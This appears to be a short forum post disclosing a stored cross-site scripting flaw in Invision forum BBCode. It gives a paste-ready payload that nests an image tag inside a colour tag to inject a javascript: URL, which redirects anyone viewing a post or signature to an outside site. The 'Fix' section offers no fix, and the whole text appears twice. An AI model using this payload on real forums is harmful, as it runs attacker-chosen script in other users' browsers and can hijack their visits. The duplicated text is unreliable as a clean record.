Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascr
ipt:document.location.replace('http://www.hackthissite.org');") [/color]
Fix:
I'm not good at regexes :)
Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascr
ipt:document.location.replace('http://www.hackthissite.org');") [/color]
Fix:
I'm not good at regexes :)
[ reply ]